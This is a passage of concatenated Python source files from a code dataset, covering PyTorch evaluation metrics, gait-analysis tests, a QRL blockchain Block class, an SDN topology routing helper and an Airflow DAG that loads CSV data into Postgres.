len(input_tensor.size())==1: #binary\n input_tensor=input_tensor.gt(0.5).float()\n else:\n input_tensor=argmax(input_tensor,axis).squeeze()\n if target_tensor.dtype!=torch.int64:\n target_tensor=argmax(target_tensor,axis).squeeze()\n if input_tensor.shape!=target_tensor.shape and topk==1:\n raise ValueError('input shape {0} is not competable with target shape {1}'.format(input_tensor.shape,target_tensor.shape))\n\n input_mask=ones_like(input_tensor)\n if isinstance(ignore_index, int) and 0 <= ignore_index < num_classes:\n input_mask[input_tensor==ignore_index] = 0\n elif isinstance(ignore_index, (list, tuple)):\n for idx in ignore_index:\n if isinstance(idx, int) and 0 <= idx < int_shape(output)[axis]:\n input_mask[input_tensor == idx] = 0\n\n batch_size = target_tensor.size(0)\n if topk==1:\n return (input_tensor.eq(target_tensor).float()*input_mask).sum()/clip((input_mask).float().sum(),min=1)\n else:\n _, pred = input_tensor.topk(topk)\n pred = pred.t()\n correct = pred.eq(target_tensor.reshape((1, -1)).expand_as(pred))\n correct_k = reduce_sum(correct[:topk].reshape(-1).float(),axis=0,keepdims=True)\n return correct_k.mul_(1 / batch_size)\n\n\n\n@torch.no_grad()\ndef recall(output, target, axis=1,ignore_index=-100):\n \"\"\"Computes the precision@k for the specified values of k\n prec1, prec5 = accuracy(output.data, target, topk=(1, 5))\n \"\"\"\n 
input_tensor=output.copy().detach()\n    target_tensor=target.copy().detach()\n    num_classes = int_shape(output)[axis]\n\n\n    is_logsoftmax = None\n    from_logits = None\n    output_exp = exp(input_tensor)\n    if (ndim(input_tensor) >= 1 and 'float' in str(input_tensor.dtype) and input_tensor.min() >= 0 and input_tensor.max() <= 1):\n        is_logsoftmax = False\n        from_logits = True\n        input_tensor = clip(input_tensor, min=1e-8, max=1 - 1e-8)\n\n    elif (ndim(output_exp) >= 1 and 'float' in str(output_exp.dtype) and output_exp.min() >= 0 and output_exp.max() <= 1):\n        is_logsoftmax = True\n        from_logits = True\n        input_tensor = clip(output_exp, min=1e-8, max=1 - 1e-8)\n    else:\n        is_logsoftmax = False\n        from_logits = False\n\n    if input_tensor.dtype!=torch.int64 :\n        if len(input_tensor.size())==1: #binary\n            input_tensor=input_tensor.gt(0.5).float()\n        else:\n            input_tensor=argmax(input_tensor,axis).squeeze()\n    if target_tensor.dtype!=torch.int64:\n        target_tensor=argmax(target_tensor,axis).squeeze()\n    if input_tensor.shape!=target_tensor.shape :\n        raise ValueError('input shape {0} is not compatible with target shape {1}'.format(input_tensor.shape,target_tensor.shape))\n    target_mask=ones_like(target_tensor)\n    if isinstance(ignore_index, int) and 0 <= ignore_index < num_classes:\n        target_mask[target_tensor==ignore_index] = 0\n    elif isinstance(ignore_index, (list, tuple)):\n        for idx in ignore_index:\n            if isinstance(idx, int) and 0 <= idx < int_shape(output)[axis]:\n                target_mask[target_tensor == idx] = 0\n\n    batch_size = target_tensor.size(0)\n    return (input_tensor.eq(target_tensor).float()*target_mask).sum()/clip((target_mask).float().sum(),min=1)\n\n\n\n\n@torch.no_grad()\ndef psnr(output, target):\n    input_tensor = output.clone().detach()\n    target_tensor = target.clone().detach()\n    if input_tensor.shape != target_tensor.shape :\n        raise ValueError(\n            'input shape {0} is not compatible with target shape {1}'.format(input_tensor.shape, target_tensor.shape))\n\n    max_value = 255\n    target_np = to_numpy(target_tensor)\n    if target_np.min() <0 :\n        target_tensor = (target_tensor + 1) * 0.5\n        input_tensor = (input_tensor + 1) * 0.5\n        max_value = 1\n    elif 0 <= target_np.min() <= 1 and 0 <= target_np.max() <= 1:\n        max_value = 1\n    rmse = ((input_tensor - target_tensor) ** 2).mean().sqrt()\n    psnr = 20 * ((max_value/ rmse).log10_())\n    return psnr\n\n@torch.no_grad()\ndef mean_absolute_error(output, target):\n    input_tensor = output.view(-1).clone().detach()\n    target_tensor = target.view(-1).clone().detach()\n\n    if input_tensor.shape != target_tensor.shape:\n        raise ValueError(\n            'input shape {0} is not compatible with target shape {1}'.format(input_tensor.shape, target_tensor.shape))\n    return torch.abs(input_tensor- target_tensor).mean()\nmae=mean_absolute_error\n\n@torch.no_grad()\ndef mean_squared_error(output, target):\n    input_tensor = output.view(-1).clone().detach()\n    target_tensor = target.view(-1).clone().detach()\n\n    if input_tensor.shape != target_tensor.shape:\n        raise ValueError(\n            'input shape {0} is not compatible with target shape {1}'.format(input_tensor.shape, target_tensor.shape))\n    return F.mse_loss(input_tensor, target_tensor)\nmse=mean_squared_error\n\n\n\n@torch.no_grad()\ndef root_mean_squared_error(output, target):\n    input_tensor=output.view(-1).clone().detach()\n    target_tensor=target.view(-1).clone().detach()\n\n    if input_tensor.shape!=target_tensor.shape :\n        raise ValueError('input shape {0} is not compatible with target shape {1}'.format(input_tensor.shape,target_tensor.shape))\n    return 
torch.sqrt(F.mse_loss(input_tensor, target_tensor,reduction='mean'))\nrmse=root_mean_squared_error\n\n\n@torch.no_grad()\ndef mean_squared_logarithmic_error(output, target):\n    input_tensor=output.view(-1).clone().detach()\n    target_tensor=target.view(-1).clone().detach()\n\n    if input_tensor.shape!=target_tensor.shape :\n        raise ValueError('input shape {0} is not compatible with target shape {1}'.format(input_tensor.shape,target_tensor.shape))\n    return F.mse_loss(torch.log(1 + input_tensor), torch.log(1 + target_tensor))\nmsle=mean_squared_logarithmic_error\n\n\n@torch.no_grad()\ndef pixel_accuracy(output, target):\n    input_tensor = output.clone().detach()\n    target_tensor = target.clone().detach()\n    if input_tensor.dtype!=torch.int64 :\n        input_tensor=argmax(input_tensor,axis=1).squeeze()\n    pixel_labeled = (target_tensor > 0).sum().float()\n    pixel_correct = ((input_tensor == target_tensor)*(target_tensor > 0)).sum().float()\n    return pixel_correct/max(pixel_labeled,1)\n\n@torch.no_grad()\ndef alpha_pixel_accuracy(output, alpha):\n    output_tensor = to_numpy(output)\n    alpha_tensor = to_numpy(alpha)\n\n    trimap=alpha_tensor.copy()\n    trimap[(0<trimap)*(trimap<0.95)]=0.5\n    trimap[trimap>0.95]=1\n    pixel_labeled = (output_tensor > 0).sum()\n    pixel_correct = ((output_tensor == alpha_tensor)*(trimap == 1)).sum()+ (np.less(np.abs(output_tensor - alpha_tensor),0.1).astype(np.float32)*(trimap == 0.5)).sum()\n    return pixel_correct/max(pixel_labeled,1)\n\n@torch.no_grad()\ndef iou(output, target):\n    input_tensor = output.clone().detach()\n    target_tensor = target.clone().detach()\n    if input_tensor.dtype != torch.int64:\n        input_tensor = argmax(input_tensor, axis=1).squeeze()\n\n    intersection =( (input_tensor > 0) * (input_tensor == target_tensor)).sum().float()\n    union=((input_tensor+target_tensor)>0).sum().float()\n\n    return intersection/max(union,1)\n\n\ndef get_metric(metric_name):\n    if metric_name is None:\n        return None\n\n    metric_modules = ['trident.optims.pytorch_metrics']\n    if metric_name in __all__:\n        metric_fn = get_function(metric_name, metric_modules)\n    else:\n        try:\n            metric_fn = get_function(camel2snake(metric_name), metric_modules)\n        except Exception :\n            metric_fn = get_function(metric_name, metric_modules)\n    return metric_fn\n\n\n\n","sub_path":"trident/optims/pytorch_metrics.py","file_name":"pytorch_metrics.py","file_ext":"py","file_size_in_byte":10530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"198759174","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# builtin\nimport os\n\n# external\nimport numpy as np\nfrom numpy import testing\nimport pandas\nfrom nose.tools import assert_raises\n\n# local\nfrom ..gait import find_constant_speed, interpolate, WalkingData\nfrom dtk.process import time_vector\n\n# debugging\ntry:\n    from IPython.core.debugger import Tracer\nexcept ImportError:\n    pass\nelse:\n    set_trace = Tracer()\n\n\ndef test_find_constant_speed():\n\n    speed_array = np.loadtxt(os.path.join(os.path.dirname(__file__),\n                                          'data/treadmill-speed.csv'),\n                              delimiter=',')\n    time = speed_array[:, 0]\n    speed = speed_array[:, 1]\n\n    indice, constant_speed_time = find_constant_speed(time, speed, plot=False)\n\n    assert 6.5 < constant_speed_time < 7.5\n\n\ndef test_interpolate():\n\n    df = pandas.DataFrame({'a': [np.nan, 3.0, 5.0, 7.0],\n                           'b': [5.0, np.nan, 9.0, 11.0],\n                           'c': [2.0, 4.0, 6.0, 8.0],\n                           'd': [0.5, 1.0, 1.5, np.nan]},\n                          index=[0.0, 2.0, 4.0, 6.0])\n\n    time = [0.0, 1.0, 3.0, 5.0]\n\n    interpolated = interpolate(df, time)\n\n    # NOTE : pandas.Series.interpolate does not 
extrapolate (because\n    # np.interp doesn't).\n\n    df_expected = pandas.DataFrame({'a': [4.0, 4.0, 4.0, 6.0],\n                                    'b': [5.0, 6.0, 8.0, 10.0],\n                                    'c': [2.0, 3.0, 5.0, 7.0],\n                                    'd': [0.5, 0.75, 1.25, 1.5]},\n                                   index=time)\n\n    testing.assert_allclose(interpolated.values, df_expected.values)\n    testing.assert_allclose(interpolated.index.values.astype(float),\n                            df_expected.index.values.astype(float))\n\n\nclass TestWalkingData():\n\n    def setup(self):\n\n        time = time_vector(1000, 100)\n\n        omega = 2 * np.pi\n\n        right_grf = 1000 * (0.75 + np.sin(omega * time))\n        right_grf[right_grf < 0.0] = 0.0\n        right_grf += 2.0 * np.random.normal(size=right_grf.shape)\n\n        left_grf = 1000 * (0.75 + np.cos(omega * time))\n        left_grf[left_grf < 0.0] = 0.0\n        left_grf += 2.0 * np.random.normal(size=left_grf.shape)\n\n        right_knee_angle = np.arange(len(time))\n        right_knee_moment = np.arange(len(time))\n\n        self.data_frame = \\\n            pandas.DataFrame({'Right Vertical GRF': right_grf,\n                              'Left Vertical GRF': left_grf,\n                              'Right Knee Angle': right_knee_angle,\n                              'Right Knee Moment': right_knee_moment},\n                             index=time)\n\n        self.threshold = 10.0\n\n    def test_init(self):\n\n        walking_data = WalkingData(self.data_frame)\n\n        assert walking_data.raw_data is self.data_frame\n\n    def test_grf_landmarks(self, plot=False):\n\n        walking_data = WalkingData(self.data_frame)\n\n        right_strikes, left_strikes, right_offs, left_offs = \\\n            walking_data.grf_landmarks('Right Vertical GRF',\n                                       'Left Vertical GRF',\n                                       threshold=self.threshold,\n                                       do_plot=plot)\n\n        right_zero = self.data_frame['Right Vertical GRF'] < self.threshold\n        instances = right_zero.apply(lambda x: 1 if x else 0).diff()\n        expected_right_offs = \\\n            instances[instances == 1].index.values.astype(float)\n        expected_right_strikes = \\\n            instances[instances == -1].index.values.astype(float)\n\n        left_zero = self.data_frame['Left Vertical GRF'] < self.threshold\n        instances = left_zero.apply(lambda x: 1 if x else 0).diff()\n        expected_left_offs = \\\n            instances[instances == 1].index.values.astype(float)\n        expected_left_strikes = \\\n            instances[instances == -1].index.values.astype(float)\n\n        testing.assert_allclose(expected_right_offs, right_offs)\n        testing.assert_allclose(expected_right_strikes, right_strikes)\n\n        testing.assert_allclose(expected_left_offs, left_offs)\n        testing.assert_allclose(expected_left_strikes, left_strikes)\n\n    def test_split_at(self, plot=False):\n\n        walking_data = WalkingData(self.data_frame)\n        walking_data.grf_landmarks('Right Vertical GRF',\n                                   'Left Vertical GRF',\n                                   threshold=self.threshold)\n\n        side = 'right'\n        series = 'Right Vertical GRF'\n\n        steps = walking_data.split_at('right')\n\n        for i, step in steps.iteritems():\n            start_step = walking_data.strikes[side][i]\n            end_step = walking_data.strikes[side][i + 1]\n            testing.assert_allclose(step[series],\n                                    walking_data.raw_data[series][start_step:end_step])\n\n        if plot is True:\n            walking_data.plot_steps(series, 'Left Vertical GRF')\n\n        steps = walking_data.split_at(side, 'stance')\n\n        for i, step in steps.iteritems():\n            start_step = walking_data.strikes[side][i]\n            end_step = walking_data.offs[side][i + 1]\n            testing.assert_allclose(step[series],\n                                    walking_data.raw_data[series][start_step:end_step])\n\n        if plot is True:\n            walking_data.plot_steps(series, 'Left Vertical GRF')\n\n        steps = walking_data.split_at(side, 'swing')\n\n        for i, step in steps.iteritems():\n            start_step = walking_data.offs[side][i]\n            end_step = walking_data.strikes[side][i]\n            
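# each swing slice must reproduce the raw series between its two landmarks\n            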
testing.assert_allclose(step[series],\n walking_data.raw_data[series][start_step:end_step])\n\n if plot is True:\n walking_data.plot_steps(series, 'Left Vertical GRF')\n import matplotlib.pyplot as plt\n plt.show()\n\n def test_plot_steps(self):\n\n walking_data = WalkingData(self.data_frame)\n walking_data.grf_landmarks('Right Vertical GRF',\n 'Left Vertical GRF',\n threshold=self.threshold)\n walking_data.split_at('right')\n\n assert_raises(ValueError, walking_data.plot_steps)\n\n\n","sub_path":"gaitanalysis/test/test_gait.py","file_name":"test_gait.py","file_ext":"py","file_size_in_byte":6260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"480361586","text":"# coding=utf-8\r\n# Distributed under the MIT software license, see the accompanying\r\n# file LICENSE or http://www.opensource.org/licenses/mit-license.php.\r\nfrom collections import OrderedDict\r\n\r\nfrom google.protobuf.json_format import MessageToJson, Parse\r\nfrom pyqrllib.pyqrllib import bin2hstr\r\n\r\nfrom qrl.core import config\r\nfrom qrl.core.misc import logger, ntp\r\nfrom qrl.core.txs.Transaction import Transaction\r\nfrom qrl.core.txs.CoinBase import CoinBase\r\nfrom qrl.core.BlockHeader import BlockHeader\r\nfrom qrl.crypto.misc import merkle_tx_hash\r\nfrom qrl.generated import qrl_pb2\r\n\r\n\r\nclass Block(object):\r\n def __init__(self, protobuf_block=None):\r\n self._data = protobuf_block\r\n if protobuf_block is None:\r\n self._data = qrl_pb2.Block()\r\n\r\n self.blockheader = BlockHeader(self._data.header)\r\n\r\n def __eq__(self, other):\r\n equality = (self.block_number == other.block_number) and (self.headerhash == other.headerhash) and (\r\n self.prev_headerhash == other.prev_headerhash) and (self.timestamp == other.timestamp) and (\r\n self.mining_nonce == other.mining_nonce)\r\n return equality\r\n\r\n @property\r\n def size(self):\r\n return self._data.ByteSize()\r\n\r\n @property\r\n def pbdata(self):\r\n \"\"\"\r\n Returns a protobuf object that contains persistable data representing this object\r\n :return: A protobuf Block object\r\n :rtype: qrl_pb2.Block\r\n \"\"\"\r\n return self._data\r\n\r\n @property\r\n def block_number(self):\r\n return self.blockheader.block_number\r\n\r\n @property\r\n def epoch(self):\r\n return int(self.block_number // config.dev.blocks_per_epoch)\r\n\r\n @property\r\n def headerhash(self):\r\n return self.blockheader.headerhash\r\n\r\n @property\r\n def prev_headerhash(self):\r\n return self.blockheader.prev_headerhash\r\n\r\n @property\r\n def transactions(self):\r\n return self._data.transactions\r\n\r\n @property\r\n def mining_nonce(self):\r\n return self.blockheader.mining_nonce\r\n\r\n @property\r\n def block_reward(self):\r\n return self.blockheader.block_reward\r\n\r\n @property\r\n def fee_reward(self):\r\n return self.blockheader.fee_reward\r\n\r\n @property\r\n def timestamp(self):\r\n return self.blockheader.timestamp\r\n\r\n @property\r\n def mining_blob(self) -> bytes:\r\n return self.blockheader.mining_blob\r\n\r\n @property\r\n def mining_nonce_offset(self) -> bytes:\r\n return self.blockheader.nonce_offset\r\n\r\n @staticmethod\r\n def from_json(json_data):\r\n pbdata = qrl_pb2.Block()\r\n Parse(json_data, pbdata)\r\n return Block(pbdata)\r\n\r\n def verify_blob(self, blob: bytes) -> bool:\r\n return self.blockheader.verify_blob(blob)\r\n\r\n def set_nonces(self, mining_nonce, extra_nonce=0):\r\n self.blockheader.set_nonces(mining_nonce, extra_nonce)\r\n 
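# keep the cached protobuf header in sync with the BlockHeader we just mutated\r\n        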
self._data.header.MergeFrom(self.blockheader.pbdata)\r\n\r\n def to_json(self) -> str:\r\n # FIXME: Remove once we move completely to protobuf\r\n return MessageToJson(self._data, sort_keys=True)\r\n\r\n def serialize(self) -> str:\r\n return self._data.SerializeToString()\r\n\r\n @staticmethod\r\n def deserialize(data):\r\n pbdata = qrl_pb2.Block()\r\n pbdata.ParseFromString(bytes(data))\r\n block = Block(pbdata)\r\n return block\r\n\r\n @staticmethod\r\n def _copy_tx_pbdata_into_block(block, tx):\r\n block._data.transactions.extend([tx.pbdata])\r\n\r\n @staticmethod\r\n def create(block_number: int,\r\n prev_headerhash: bytes,\r\n prev_timestamp: int,\r\n transactions: list,\r\n miner_address: bytes):\r\n\r\n block = Block()\r\n\r\n # Process transactions\r\n hashedtransactions = []\r\n fee_reward = 0\r\n\r\n for tx in transactions:\r\n fee_reward += tx.fee\r\n\r\n # Prepare coinbase tx\r\n total_reward_amount = BlockHeader.block_reward_calc(block_number) + fee_reward\r\n coinbase_tx = CoinBase.create(total_reward_amount, miner_address, block_number)\r\n hashedtransactions.append(coinbase_tx.txhash)\r\n Block._copy_tx_pbdata_into_block(block, coinbase_tx) # copy memory rather than sym link\r\n\r\n for tx in transactions:\r\n hashedtransactions.append(tx.txhash)\r\n Block._copy_tx_pbdata_into_block(block, tx) # copy memory rather than sym link\r\n\r\n txs_hash = merkle_tx_hash(hashedtransactions) # FIXME: Find a better name, type changes\r\n\r\n tmp_blockheader = BlockHeader.create(blocknumber=block_number,\r\n prev_headerhash=prev_headerhash,\r\n prev_timestamp=prev_timestamp,\r\n hashedtransactions=txs_hash,\r\n fee_reward=fee_reward)\r\n\r\n block.blockheader = tmp_blockheader\r\n\r\n block._data.header.MergeFrom(tmp_blockheader.pbdata)\r\n\r\n block.set_nonces(0, 0)\r\n\r\n return block\r\n\r\n def update_mining_address(self, mining_address: bytes):\r\n coinbase_tx = Transaction.from_pbdata(self.transactions[0])\r\n coinbase_tx.update_mining_address(mining_address)\r\n hashedtransactions = []\r\n\r\n for tx in self.transactions:\r\n hashedtransactions.append(tx.transaction_hash)\r\n\r\n self.blockheader.update_merkle_root(merkle_tx_hash(hashedtransactions))\r\n\r\n self._data.header.MergeFrom(self.blockheader.pbdata)\r\n\r\n def validate(self, chain_manager, future_blocks: OrderedDict) -> bool:\r\n if chain_manager.get_block_is_duplicate(self):\r\n logger.warning('Duplicate Block #%s %s', self.block_number, bin2hstr(self.headerhash))\r\n return False\r\n\r\n parent_block = chain_manager.get_block(self.prev_headerhash)\r\n\r\n # If parent block not found in state, then check if its in the future block list\r\n if not parent_block:\r\n try:\r\n parent_block = future_blocks[self.prev_headerhash]\r\n except KeyError:\r\n logger.warning('Parent block not found')\r\n logger.warning('Parent block headerhash %s', bin2hstr(self.prev_headerhash))\r\n return False\r\n\r\n if not self._validate_parent_child_relation(parent_block):\r\n logger.warning('Failed to validate blocks parent child relation')\r\n return False\r\n\r\n if not chain_manager.validate_mining_nonce(self.blockheader):\r\n logger.warning('Failed PoW Validation')\r\n return False\r\n\r\n if len(self.transactions) == 0:\r\n return False\r\n\r\n try:\r\n coinbase_txn = Transaction.from_pbdata(self.transactions[0])\r\n coinbase_amount = coinbase_txn.amount\r\n\r\n if not coinbase_txn.validate_extended(self.block_number):\r\n return False\r\n\r\n except Exception as e:\r\n logger.warning('Exception %s', e)\r\n return False\r\n\r\n # 
Build transaction merkle tree, calculate fee reward, and then see if BlockHeader also agrees.\r\n hashedtransactions = []\r\n\r\n for tx in self.transactions:\r\n tx = Transaction.from_pbdata(tx)\r\n hashedtransactions.append(tx.txhash)\r\n\r\n fee_reward = 0\r\n for index in range(1, len(self.transactions)):\r\n fee_reward += self.transactions[index].fee\r\n\r\n if not self.blockheader.validate(fee_reward, coinbase_amount, merkle_tx_hash(hashedtransactions)):\r\n return False\r\n\r\n return True\r\n\r\n def apply_state_changes(self, address_txn: dict) -> bool:\r\n coinbase_tx = Transaction.from_pbdata(self.transactions[0])\r\n\r\n if not coinbase_tx.validate_extended(self.block_number):\r\n logger.warning('Coinbase transaction failed')\r\n return False\r\n\r\n coinbase_tx.apply_state_changes(address_txn)\r\n\r\n len_transactions = len(self.transactions)\r\n for tx_idx in range(1, len_transactions):\r\n tx = Transaction.from_pbdata(self.transactions[tx_idx])\r\n\r\n if isinstance(tx, CoinBase):\r\n logger.warning('Found another coinbase transaction')\r\n return False\r\n\r\n if not tx.validate():\r\n return False\r\n\r\n addr_from_pk_state = address_txn[tx.addr_from]\r\n addr_from_pk = Transaction.get_slave(tx)\r\n if addr_from_pk:\r\n addr_from_pk_state = address_txn[addr_from_pk]\r\n\r\n if not tx.validate_extended(address_txn[tx.addr_from], addr_from_pk_state):\r\n return False\r\n\r\n expected_nonce = addr_from_pk_state.nonce + 1\r\n\r\n if tx.nonce != expected_nonce:\r\n logger.warning('nonce incorrect, invalid tx')\r\n logger.warning('subtype: %s', tx.type)\r\n logger.warning('%s actual: %s expected: %s', tx.addr_from, tx.nonce, expected_nonce)\r\n return False\r\n\r\n if addr_from_pk_state.ots_key_reuse(tx.ots_key):\r\n logger.warning('pubkey reuse detected: invalid tx %s', bin2hstr(tx.txhash))\r\n logger.warning('subtype: %s', tx.type)\r\n return False\r\n\r\n tx.apply_state_changes(address_txn)\r\n\r\n return True\r\n\r\n def is_future_block(self) -> bool:\r\n if self.timestamp > ntp.getTime() + config.dev.block_max_drift:\r\n return True\r\n\r\n return False\r\n\r\n def _validate_parent_child_relation(self, parent_block) -> bool:\r\n return self.blockheader.validate_parent_child_relation(parent_block)\r\n","sub_path":"src/qrl/core/Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":9693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"479222985","text":"import collections\n\nimport networkx as nx\nimport inject\nimport random\n\n\nclass SDNTopologyResolution(object):\n def __init__(self, controller_handler=None, logger=None):\n self.controller = controller_handler\n self.switches_list = []\n self.graph = None\n self.diGraph = None\n self.edges = None\n self.topology = None\n self._logger = logger\n self.switches_ports = dict()\n self.connected_edges = dict()\n self.leaf_switches_list = []\n self.in_out_ports = dict()\n\n self.build_graph()\n\n @property\n def logger(self):\n if self._logger is None:\n try:\n self._logger = inject.instance('logger')\n except:\n raise Exception('SDNRoutingResolution', 'Logger is none or empty')\n return self._logger\n\n def build_graph(self):\n self.graph = nx.Graph()\n self.diGraph = nx.DiGraph()\n\n self.get_topology()\n self.get_switches()\n self.get_edges()\n\n self.get_leaf_switches()\n\n nodeProperties = self.switches_list\n nodes = nodeProperties['nodeProperties']\n\n for node in nodes:\n self.graph.add_node(node['node']['id'])\n 
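# mirror each node into the directed copy of the topology as well\n            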
self.diGraph.add_node(node['node']['id'])\n self.build_edges_structure()\n\n def get_topology(self):\n self.topology = self.controller.get_query('topology', '')\n\n def get_switches(self):\n self.switches_list = self.controller.get_query('switchmanager', '/nodes')\n\n def get_edges(self):\n edgeProperties = self.topology\n self.edges = edgeProperties['edgeProperties']\n\n for edge in self.edges:\n e = (edge['edge']['headNodeConnector']['node']['id'], edge['edge']['tailNodeConnector']['node']['id'])\n self.graph.add_edge(*e)\n self.diGraph.add_edge(*e)\n\n def get_leaf_switches(self):\n leaf_switches_tuple = self.lowest_centrality(nx.betweenness_centrality(self.graph, endpoints=True))\n map(lambda x: self.leaf_switches_list.append(x[1]) if x[1] not in self.leaf_switches_list else False,\n leaf_switches_tuple)\n return self.leaf_switches_list\n\n def lowest_centrality(self, centrality_dict):\n cent_items = [(b, a) for (a, b) in centrality_dict.iteritems() if b == min(centrality_dict.values())]\n cent_items.sort()\n return cent_items\n\n def get_routing_path_between_two_endpoints(self, srcNode, dstNode):\n path = nx.dijkstra_path(self.graph, srcNode, dstNode)\n return path\n\n def get_switches_ports(self):\n for switch_id in self.leaf_switches_list:\n connectors = self.controller.get_query('switchmanager', '/node/OF/{}'.format(switch_id))\n self.switches_ports[switch_id] = {}\n for connector in connectors[\"nodeConnectorProperties\"]:\n if \"bandwidth\" not in connector['properties']:\n continue # connector is a switch itself, skip it\n\n port_name = connector['properties']['name']['value']\n\n for edge in self.edges:\n if port_name == edge['properties']['name']['value']:\n break # exclude trunk ports\n else:\n self.switches_ports[switch_id][connector[\"nodeconnector\"][\"id\"]] = {\n \"bandwidth\": connector['properties']['bandwidth']['value'],\n \"name\": port_name\n }\n\n return self.switches_ports\n\n def build_edges_structure(self):\n for edge in self.edges:\n headedge_id = edge['edge']['headNodeConnector']['node']['id']\n tailedge_id = edge['edge']['tailNodeConnector']['node']['id']\n if not (self.connected_edges.get(headedge_id)):\n self.connected_edges[headedge_id] = {}\n self.connected_edges[headedge_id].update({tailedge_id: {\"out_port\": edge['edge']['headNodeConnector']['id'], \\\n \"in_port\": edge['edge']['tailNodeConnector'][\n 'id']}})\n\n def build_ports(self):\n for edge in self.edges:\n headedge_id = edge['edge']['headNodeConnector']['node']['id']\n tailedge_id = edge['edge']['tailNodeConnector']['node']['id']\n self.in_out_ports[headedge_id + \"-\" + tailedge_id] = edge['edge']['tailNodeConnector']['id']\n\n def compute_the_route_with_ports(self, src_switch, src_switch_port, dst_switch, dst_switch_port, route):\n json_dict = collections.OrderedDict()\n self.build_ports()\n\n route_len = len(route)\n head_to_tail = ''\n\n for indx, switch in enumerate(route):\n if (self.connected_edges.get(switch)):\n for tailswitch in self.connected_edges[switch]:\n if (indx + 1 < route_len):\n if (tailswitch == route[indx + 1]):\n if (indx != 0):\n head_to_tail = route[indx - 1] + \"-\" + switch\n\n if (src_switch == switch):\n\n json_dict.update({switch: {\"in_port\": src_switch_port, \"out_port\": \\\n self.connected_edges[switch][tailswitch]['out_port']}})\n\n else:\n json_dict.update({switch: {\"in_port\": self.in_out_ports[head_to_tail], \"out_port\": \\\n self.connected_edges[switch][tailswitch]['out_port']}})\n else:\n if (indx != 0):\n head_to_tail = route[indx - 1] + \"-\" + 
switch\n if (dst_switch == switch):\n json_dict.update({switch: {\"in_port\": self.in_out_ports[head_to_tail], \"out_port\": \\\n dst_switch_port}})\n return json_dict\n\n def return_route_with_ports(self, src_switch, src_switch_port, dst_switch, dst_switch_port, route):\n path = self.get_routing_path_between_two_endpoints(src_switch, dst_switch)\n path_with_ports = self.compute_the_route_with_ports(src_switch, src_switch_port, dst_switch, dst_switch_port,\n route)\n return path_with_ports\n\n\ndef uniqueid():\n seed = random.getrandbits(32)\n while True:\n yield seed\n seed += 1\n","sub_path":"cloudshell/networking/sdn/resolution/topology_resolution.py","file_name":"topology_resolution.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"115517569","text":"# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport airflow\nimport os\nfrom datetime import datetime, timedelta\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.postgres_operator import PostgresOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow import DAG\nfrom airflow import models\nfrom airflow.settings import Session\nimport logging\n\n\nDAG_DEFAULT_ARGS = dict(owner='Gamma',\n depends_on_past=True,\n start_date=airflow.utils.dates.days_ago(2),\n provide_context=True,\n retries=5,\n retry_delay=timedelta(minutes=1))\n\ndag = DAG('LoadData',\n default_args=DAG_DEFAULT_ARGS,\n schedule_interval=\"@once\",\n concurrency=5)\n\nt_create_tables = PostgresOperator(task_id=\"create_tables\",\n postgres_conn_id='psql_conn',\n sql=open('/warehouse/sql/ddl/create_tables.pgsql').read(),\n dag=dag)\n\nt_game_day = PostgresOperator(task_id=\"load_game_day\",\n postgres_conn_id='psql_conn',\n sql=\"copy game_data from '/warehouse/data/raw/game_data.csv' delimiter ',' CSV HEADER;\",\n dag=dag)\n\nt_play_info = PostgresOperator(task_id=\"load_play_info\",\n postgres_conn_id='psql_conn',\n sql=\"copy play_info from '/warehouse/data/raw/play_information.psv' delimiter '|' CSV HEADER;\",\n dag=dag)\n\nt_play_player_role = PostgresOperator(task_id=\"load_play_player_role\",\n postgres_conn_id='psql_conn',\n sql=\"copy play_player_role from '/warehouse/data/raw/play_player_role_data.csv' delimiter ',' CSV HEADER;\",\n dag=dag)\n\nt_player_punt_data = PostgresOperator(task_id=\"load_player_punt_data\",\n postgres_conn_id='psql_conn',\n sql=\"copy player_punt_data from '/warehouse/data/raw/player_punt_data.csv' delimiter ',' CSV HEADER;\",\n dag=dag)\n\nt_video_footage_control = PostgresOperator(task_id=\"load_video_footage_control\",\n postgres_conn_id='psql_conn',\n sql=\"copy video_footage_control from '/warehouse/data/raw/video_footage-control.psv' delimiter '|' CSV HEADER;\",\n dag=dag)\n\nt_video_footage_injury = PostgresOperator(task_id=\"load_video_footage_injury\",\n postgres_conn_id='psql_conn',\n sql=\"copy 
video_footage_injury from '/warehouse/data/raw/video_footage-injury.psv' delimiter '|' CSV HEADER;\",\n                                          dag=dag)\n\nt_video_review = PostgresOperator(task_id=\"load_video_review\",\n                                  postgres_conn_id='psql_conn',\n                                  sql=\"copy video_review from '/warehouse/data/raw/video_review.csv' delimiter ',' CSV HEADER;\",\n                                  dag=dag)\n\nt_create_tables >> t_game_day\nt_create_tables >> t_play_info\nt_create_tables >> t_play_player_role\nt_create_tables >> t_player_punt_data\nt_create_tables >> t_video_footage_control\nt_create_tables >> t_video_footage_injury\nt_create_tables >> t_video_review\n\n# LOAD NGS DATA\npth = '/warehouse/data/raw'\nfiles = [os.path.join(pth, f) for f in os.listdir(pth) if 'ngs' in f.lower()]\ntemplate = \"copy ngs_data from '{}' delimiter ',' CSV HEADER;\"\nscripts = [template.format(f) for f in files]\n\n# Load sequentially\nfor i,script in enumerate(scripts):\n    if i==0:\n        t_a = PostgresOperator(task_id=\"load_ngs_{}\".format(i),\n                               postgres_conn_id='psql_conn',\n                               sql=script,\n                               dag=dag)\n        t_create_tables >> t_a \n    else:\n        t_b = PostgresOperator(task_id=\"load_ngs_{}\".format(i),\n                               